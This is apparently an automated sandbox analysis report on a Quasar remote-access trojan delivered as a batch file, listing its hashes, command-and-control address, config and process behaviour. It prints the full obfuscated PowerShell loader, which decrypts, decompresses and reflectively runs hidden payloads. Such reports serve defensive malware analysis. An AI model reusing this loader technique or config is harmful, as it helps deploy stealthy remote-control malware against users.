Analysis
- max time kernel: 148s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 24-12-2024 05:16

Static task: static1
Behavioral task: behavioral1
- Sample: Client-built.bat
- Resource: win7-20241023-en
General
- Target: Client-built.bat
- Size: 1.6MB
- MD5: a7aa482ba1ee0ea8d147d628d5a65f05
- SHA1: 91e3a640c294a36697d9759a29072fdb4ab62346
- SHA256: 79173bee83878cae44d9fc21fa85590711a92edc2d43caafb1350eb2800e72d7
- SHA512: a27dae71d85910609682cc324d4c4cf5c2e772f0a57209d2fbdc3e345538487d1262148b01b16df8cfb52c3c2a72ae04eb381f7dcf33d77c01d532d421e93a32
- SSDEEP: 24576:tkjkTu1rkvOjvCsDjTprQ50JDzRj2umzby88rBFjB9a/In5PJBmpR4JRej08SG84:t859kWf+gEJe8yBBl+pIVX4
Malware Config
Extracted
- Family: quasar
- Version: 1.4.1
- Botnet: Office04
- C2: 85.209.133.15:111
- Mutex: 4427abb1-66d5-405b-a340-061f8386d8c1
- Attributes:
  - encryption_key: A0083941CFC8C27C9F733BBA0ECD4E4B76BD61E8
  - install_name: Client.exe
  - log_directory: Logs
  - reconnect_delay: 3000
  - startup_key: Quasar Client Startup
  - subdirectory: SubDir
Signatures
- Quasar family
- Quasar payload (1 IoC)
  resource | yara_rule
  behavioral2/memory/3780-15-0x0000026B338F0000-0x0000026B33C14000-memory.dmp | family_quasar
- Blocklisted process makes network request (3 IoCs)
  flow | pid | Process
  14 | 3780 | powershell.exe
  15 | 3780 | powershell.exe
  17 | 3780 | powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run Powershell and hide display window.
  pid | Process
  3780 | powershell.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
- Suspicious behavior: EnumeratesProcesses (12 IoCs; identical rows collapsed with counts)
  pid | Process | rows
  3780 | powershell.exe | 2
  3008 | msedge.exe | 2
  4044 | msedge.exe | 2
  3004 | identity_helper.exe | 2
  5816 | msedge.exe | 4
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (14 IoCs; identical rows collapsed with counts)
  pid | Process | rows
  4044 | msedge.exe | 14
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description | pid | Process
  Token: SeDebugPrivilege | 3780 | powershell.exe
- Suspicious use of FindShellTrayWindow (28 IoCs; identical rows collapsed with counts)
  pid | Process | rows
  3780 | powershell.exe | 3
  4044 | msedge.exe | 25
- Suspicious use of SendNotifyMessage (27 IoCs; identical rows collapsed with counts)
  pid | Process | rows
  3780 | powershell.exe | 3
  4044 | msedge.exe | 24
- Suspicious use of WriteProcessMemory (64 IoCs; identical rows collapsed with counts)
  description | pid | Process | procid_target | rows
  PID 4376 wrote to memory of 3780 | 4376 | cmd.exe | 83 | 2
  PID 4044 wrote to memory of 4244 | 4044 | msedge.exe | 94 | 2
  PID 4044 wrote to memory of 1748 | 4044 | msedge.exe | 95 | 40
  PID 4044 wrote to memory of 3008 | 4044 | msedge.exe | 96 | 2
  PID 4044 wrote to memory of 4108 | 4044 | msedge.exe | 97 | 18
Processes
- C:\Windows\system32\cmd.exe (PID 4376)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3780)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p6NsuP0HTePf1oSATs8T+qB1p4ZrLbvAIaEmbH1pdsE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kxx6XOKog+oT5+kzMuvMwA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HWbzm=New-Object System.IO.MemoryStream(,$param_var); $PCqqJ=New-Object System.IO.MemoryStream; $ePDKE=New-Object System.IO.Compression.GZipStream($HWbzm, [IO.Compression.CompressionMode]::Decompress); $ePDKE.CopyTo($PCqqJ); $ePDKE.Dispose(); $HWbzm.Dispose(); $PCqqJ.Dispose(); $PCqqJ.ToArray();}function execute_function($param_var,$param2_var){ $GchUI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZfPjM=$GchUI.EntryPoint; $ZfPjM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$QJrfq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($aydBO in $QJrfq) { if ($aydBO.StartsWith(':: ')) { $CdaqF=$aydBO.Substring(3); break; }}$payloads_var=[string[]]$CdaqF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    Signatures:
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4044)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  Signatures:
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4244)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb8bbc46f8,0x7ffb8bbc4708,0x7ffb8bbc4718
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1748)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3008)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4108)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3704)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4908)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3232)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4684)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 1372)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 3004)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 472)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 760)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5072)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3776)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3584)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4324)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 472)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5364)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5372)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5472)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5816)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,5792650056630367390,5472834348001622255,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6016 /prefetch:2
    Signatures: Suspicious behavior: EnumeratesProcesses
- C:\Windows\System32\CompPkgSrv.exe (PID 3584)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\System32\CompPkgSrv.exe (PID 1328)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
MITRE ATT&CK Enterprise v15